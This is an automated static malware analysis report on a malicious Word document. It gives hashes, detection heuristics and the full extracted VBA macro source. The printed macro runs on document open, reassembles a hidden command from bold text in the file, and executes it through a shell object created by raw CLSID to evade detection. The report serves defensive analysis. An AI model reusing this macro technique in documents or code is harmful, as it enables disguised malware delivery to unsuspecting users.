Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 66af536f09d0d2b2…

MALICIOUS

Office (OOXML)

Size: 33.6 KB
Created: 2021-03-02 08:06:00 UTC
Authoring application: Microsoft Office Word 15.0000
First seen: 2022-06-20
MD5: 1a1f638032ca63a01c77966a69753134
SHA-1: 2beb3e2e1909eef5666dfc3af7517d8d4ec4148c
SHA-256: 66af536f09d0d2b26dcb498b5343c231e6df08cc6a2395bab3e9bef09617da29
Risk score: 130

Heuristics (5)

  • VBA project inside OOXML (medium, 3 related findings) OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA instantiates a dangerous COM class by CLSID (critical) OLE_VBA_GETOBJECT_CLSID_DANGEROUS
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script
    Set vb09 = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
  • GetObject call (high) OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set vb09 = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
  • Document_Open macro (low) OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2959 bytes
SHA-256: 01e9f19dbe75b9eeb1b096cbd7f00848766f05ebb07bac69c1e42125029a7b12
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Dim pfiays As String


Private Sub Document_Open()
Call nmngtyy
End Sub

Private Sub nmngtyy()




Call zoRGbKq.MJZeDZthT




End Sub






Attribute VB_Name = "zoRGbKq"





Sub zkGNkuoJBwNLwqzYmFHm(fAsOrBYGXcskHVrWSVwQtX, sjRRlDEcDApDazDM, upCRIcEhrPubHndHjAfakmDTzokSSRWPIGWD)
RTslPZsfSARalkQYMAsPJyrWHVbXrW = 3.02622430229299E+36
ORmi = "NbUUveiwvkLGjzZE"
XZScVetyVnvzCJzC = 65008274
KlfX = "fPuaWKVnsxwytNPnsw"
End Sub



Public Sub MJZeDZthT()

On Error Resume Next
















   Dim myShape As InlineShape
    Dim myRange As Range
    For Each myRange In ActiveDocument.StoryRanges
        For Each myShape In myRange.InlineShapes
            myShape.Delete
        Next myShape
    Next myRange
Dim zxd As Variant
Dim zxtgsaqeyhzfgds3re As String



Dim oRng As Range
Dim oNewRng As Range
Set oRng = Selection.Range '(the formatted range you are wanting to write)
oRng.MoveEndWhile Chr(32), wdBackward 'Remove trailing spaces from the range
Set oNewRng = ActiveDocument.Range 'Locate the range where it is to be written
oNewRng.Collapse wdCollapseEnd
'oNewRng.FormattedText = oRng 'then write it.





 Dim Para As Paragraph
    Dim i As Long

    Application.ScreenUpdating = False
    With ActiveDocument
        For i = .Paragraphs.Count To 1 Step -1
            Set Para = .Paragraphs(i)
            With Para
                If .Range.End - .Range.Start = 1 Then
                    .Range.Delete
                Else
             If 9.4 + Sin(66) = 45.66 Then
                Else
                  .SpaceBefore = 6
                    .SpaceAfter = 6
                End If
                End If
            End With
        Next i
    End With
    Application.ScreenUpdating = True




Dim singleLine As Paragraph
   Dim rng As Range
   Dim pos As Integer
    Dim Wrd As Range

   For Each singleLine In ActiveDocument.Paragraphs
      Set rng = singleLine.Range
   
   
    
    
         If rng.Font.Bold Then
            'MsgBox "This is bold"
               lineText = singleLine.Range.Text
          zzOTXPoDh = zzOTXPoDh + lineText
        
       ' MsgBox (zzOTXPoDh)
         End If
     
   Next

WpkbB = "xOKhf"
fE = "JCT"
TDOvQ = "F"
fgmV7c9 = TQizCJo
HKODnr = "ok"
YmBx = "436"
s4n2 = "KyeOwJhq"
b7n87s = "7QnemiX"
BL3u7 = "c5KuqKtg4gr"




ZFF = Null
VCFGv = ZFF



zzOTXPoDh = Replace(zzOTXPoDh, "yueaavtwlqn", "")




Set vb09 = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
vb09.Run Gravity & "" & zzOTXPoDh, 0.0001



End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 15360 bytes
SHA-256: a428d7913b8529b464d1e41a62587db5f45f6ffd2763205355e211e38c49561c